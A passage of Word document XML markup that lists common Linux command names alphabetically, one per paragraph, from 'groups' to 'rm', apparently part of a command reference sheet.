              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E4CF054" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>gzip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28AC98A4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>gunzip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0068820E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>head</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44520896" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>history</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A20307F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF13D5E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hostnamectl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CC390F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hwclock</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69B5BC3A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>hwinfo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C02FDB8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19CC7754" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ifconfig</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="540A922E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ionice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3496BF2F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>iostat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16314B10" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C19683F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>iptables</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C12501" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>iw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB59BC4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>iwlist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B25602F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>kill</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33E7A478" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>killall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="589D6EAD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>kmod</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AABCFF2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>last</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C553C60" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ln</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF9F0F7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>locate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9DEF25" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>login</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24EC6038" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B340EE6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lshw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="372C5D21" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lscpu</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BFD9115" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lsof</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B3A128" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>lsusb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3A3CCB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>man</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="143B199B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mdsum</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A520B54" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mkdir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78895BF2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>more</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4899493A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>mv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B9B08B8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>nano</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45AA3BBB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC25A50" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710F7FAF" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>netstat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AA2477E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>nice</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E9DB4C5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432CB71E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>nproc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2579D3AA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>openssl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB9EB76" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708AEB60" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pidof</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C74B617" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ping</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="447A5FB4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ps</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B663F2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pstree</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6124EF70" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61028230" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rdiff-backup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="384957DC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>reboot</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70BC6664" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rename</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06B0F182" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>rm</w:t>
            </w:r>
          </w:p>
